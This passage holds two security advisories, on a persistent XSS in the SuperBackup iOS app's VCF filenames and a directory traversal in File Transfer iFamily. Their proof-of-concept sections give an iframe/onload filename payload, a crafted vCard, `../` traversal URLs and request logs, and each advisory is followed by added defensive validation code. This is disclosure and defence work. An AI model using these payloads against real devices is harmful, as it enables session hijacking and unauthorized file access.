needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.

(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site scripting web vulnerabilities in the official
SuperBackup v2.0.5 iOS mobile application.


Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 iOS mobile application.
The vulnerability allows remote attackers to inject their own malicious
script code with a persistent attack vector to compromise the mobile
web-application from the application-side.

The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject their own malicious persistent script
code as a vcf filename into the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is the vcf filename on rename
or import. The execution point is the main index list, rendered after
the import or insert.

Remote attackers are able to inject their own script code into the
client-side requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious sources and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] VCF

Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without a privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting
vulnerability, follow the provided information and steps below.


PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>


PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>


PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"


PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD


--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close


Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values on add, edit or import to
prevent execution
2. Restrict and filter the vcf names in the index listing to sanitize
the output
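Both fix steps above (and the equivalent steps in the DedeCMS advisory earlier on this page) come down to the same two controls: reject hostile filenames at the request handler, and escape whatever is stored before it is placed into the listing markup. The following JavaScript is an added example, not code from SuperBackup or GCDWebUploader; the function names, the in-memory file table and the `/move` handler shape are assumptions made for this illustration, while the filename and payload strings come from the advisory's PoC.

```javascript
// Added example, not SuperBackup / GCDWebUploader code. Models the two fix
// steps from the advisory: validate a VCF name when it arrives at the /move
// handler (oldPath / newPath) and HTML-escape it when the index listing is
// rendered. Function names and the in-memory file table are assumptions.

// Disallowed in a stored VCF name: HTML metacharacters, path separators,
// NUL and other control characters.
const FORBIDDEN_CHARS = /[<>"'&\\/\x00-\x1f\x7f]/;

// Input-side check (fix step 1). Returns { ok, reason }.
function validateVcfName(name) {
  if (typeof name !== "string" || name.length === 0 || name.length > 255) {
    return { ok: false, reason: "empty or too long" };
  }
  if (FORBIDDEN_CHARS.test(name)) {
    return { ok: false, reason: "contains HTML, path or control characters" };
  }
  if (!name.toLowerCase().endsWith(".vcf")) {
    return { ok: false, reason: "not a .vcf file" };
  }
  return { ok: true, reason: "" };
}

// Output-side escaping (fix step 2): every name is escaped before it is
// placed into the listing, so even a name that slipped past validation is
// rendered as text rather than markup.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Builds the column-name cell seen in the advisory's vulnerable source.
function renderNameCell(name) {
  return '<td class="column-name"><p class="edit" title="Click to rename...">' +
    escapeHtml(name) + "</p></td>";
}

// Simulated /move handler. The advisory's request carries oldPath and
// newPath as "/<name>"; `files` is a Set of stored names standing in for
// the app's Documents directory.
function handleMove(params, files) {
  const strip = (p) => (typeof p === "string" && p.startsWith("/") ? p.slice(1) : p);
  const oldName = strip(params.oldPath);
  const newName = strip(params.newPath);
  const check = validateVcfName(newName);
  if (!check.ok) {
    // Client error: the unsanitised name never reaches the file system or
    // the listing.
    return { status: 400, body: "Invalid filename: " + check.reason };
  }
  if (!files.has(oldName)) {
    return { status: 404, body: "No such file" };
  }
  files.delete(oldName);
  files.add(newName);
  return { status: 200, body: "OK" };
}

// Renders the listing rows from the stored names (escaped on output).
function renderListing(files) {
  return [...files].map((n) => "<tr>" + renderNameCell(n) + "</tr>").join("\n");
}
```

Validation alone is not enough because names can also enter the store by import (the vCard path in the PoC), which is why the listing escapes unconditionally; escaping alone is not enough because the stored name still reaches the file system, which is why the handler rejects path separators and control characters up front.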


Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



File Transfer iFamily 2.1 Directory Traversal


File Transfer iFamily version 2.1 suffers from a directory traversal vulnerability.


MD5 | ebddbc353e67d87cba2b2731cac974d1

Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2199


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
Directory- or Path-Traversal


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.

(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
iOS mobile application.


Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 iOS mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attacker changes the path, and the host redirects
to complete the address with "..". The attacker then simply
attaches a final slash to the request and the path can be accessed via
web-browser to download local files.

Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.


Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability,
follow the provided information and steps below.


PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../


--- PoC Session Logs [GET] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host address (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and
accessible ./etc/ path in the app container.
Disallow path changes in the client-side GET method requests and
validate them securely.
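The fix above amounts to one containment rule: every requested path must resolve to a location inside the directory the app intends to serve, after percent-decoding and after "." and ".." segments have been applied, and a request that would step above that directory is refused rather than clamped. The JavaScript below is an added example, not File Transfer iFamily code; `DOC_ROOT` is a placeholder for the app container's served directory, the function names are assumptions made for this illustration, and the test paths are the ones from the advisory's session log. It also pins the Host header, since the log shows the second request arriving with "Host: localhost..".

```javascript
// Added example, not File Transfer iFamily code. Keeps every requested path
// inside the document root, which is the containment check the advisory's
// fix calls for. DOC_ROOT is a placeholder, not a real iOS container path;
// function names are assumptions made for this example.

const DOC_ROOT = "/APP-CONTAINER/Documents";

// Percent-decode the URL path. A malformed sequence is treated as hostile
// rather than passed through undecoded.
function decodeUrlPath(urlPath) {
  try {
    return decodeURIComponent(urlPath);
  } catch (e) {
    return null;
  }
}

// Resolve a request path under root. Returns the absolute file path, or
// null if the request is malformed or would step outside root. A ".." that
// reaches the root is rejected rather than silently clamped, so the attempt
// stays visible to the caller (and to its logs).
function safeResolve(root, urlPath) {
  if (typeof urlPath !== "string") return null;
  const decoded = decodeUrlPath(urlPath);
  if (decoded === null || decoded.includes("\0")) return null;
  const segments = [];
  for (const seg of decoded.split(/[\\/]+/)) { // "//" and backslashes collapse
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (segments.length === 0) return null; // would climb above root
      segments.pop();
      continue;
    }
    segments.push(seg);
  }
  return segments.length === 0 ? root : root + "/" + segments.join("/");
}

// The advisory's second request arrives with "Host: localhost..". A server
// that builds redirects or paths from the Host header must pin it to the
// names it actually serves.
const ALLOWED_HOSTS = new Set(["localhost", "localhost:80"]);
function isAllowedHost(host) {
  return typeof host === "string" && ALLOWED_HOSTS.has(host.toLowerCase());
}

// Request gate combining both checks; returns an HTTP-style result.
function gateRequest(req) {
  if (!isAllowedHost(req.host)) return { status: 400, path: null };
  const resolved = safeResolve(DOC_ROOT, req.path);
  if (resolved === null) return { status: 403, path: null };
  return { status: 200, path: resolved };
}
```

Resolving segments yourself, as above, makes the decision explicit; if the platform's path normalisation is used instead, the resolved result must still be compared against the root prefix (including the trailing separator) before any file is opened, and the decode step must run before the comparison, not after.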


Security Risk:
==============
The security risk of the directory traversal web vulnerability in the
iOS mobile application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


